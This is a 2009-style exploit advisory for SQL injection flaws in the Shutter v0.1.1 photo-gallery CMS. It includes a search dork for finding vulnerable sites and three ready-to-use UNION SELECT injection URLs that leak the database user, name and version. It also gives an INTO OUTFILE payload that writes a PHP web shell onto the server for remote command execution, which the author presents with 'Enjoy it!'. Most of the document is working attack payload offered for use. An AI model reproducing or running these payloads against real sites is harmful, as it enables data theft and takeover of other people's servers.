|
-------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Shutter v-0.1.1-->
-------------------------------------------------------------
CMS INFORMATION:
-->WEB: http://shutter.tenfourzero.net/
-->DOWNLOAD: http://shutter.tenfourzero.net/
-->DEMO: http://shutter.tenfourzero.net/video.html
-->CATEGORY: CMS / Image Galleries
-->DESCRIPTION: Shutter is a web package allowing users to share their photos through
an unlimited number of albums through an easy to use administration area...
-->RELEASED: 2009-05-13=09
CMS VULNERABILITY:
-->TESTED ON: firefox 3
-->DORK: "powered by shutter v0.1.1"
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: CURRENT
-->Discovered Bug date: 2009-05-13
-->Reported Bug date: 2009-05-13
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#########################
////////////////////////
SQL INJECTION (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: magic quotes=ON/OFF +++++++++++++++++--------->>>>
-------
INTRO:
-------
Database doesn't store information about users (or admin).
This system is completely vulnerable to sql code injection.
-------------------
PROOFS OF CONCEPT:
-------------------
GET var --> 'albumID'
PoC-1: http://[HOST]/[PATH]/?albumID=-1+UNION+ALL+SELECT+database(),user()%23
GET var --> 'tagID'
PoC-2: http://[HOST]/[PATH]/?tagID=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,database())%23
GET var --> 'photoID'
PoC-3: http://[HOST]/[PATH]/?photoID=-1+UNION+ALL+SELECT+concat(user(),0x3A3A3A,version()),2%23
Return --> user and database in DB
-------------------------
EXPLOIT (SHELL UPLOAD):
-------------------------
<<<<---------++++++++++++++ Condition: Permission to create files +++++++++++++++++--------->>>>
Configure --> [COMPLETE-PATH]
http://[HOST]/[PATH]/?albumID=-1+UNION+ALL+SELECT+'
YOUR SHELL IS ON!
Get var (cmd) to execute comands. Enjoy it!
Command Result:
','By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com
'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23
Return: Your shell in --> http://[HOST]/[PATH]/shell.php
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################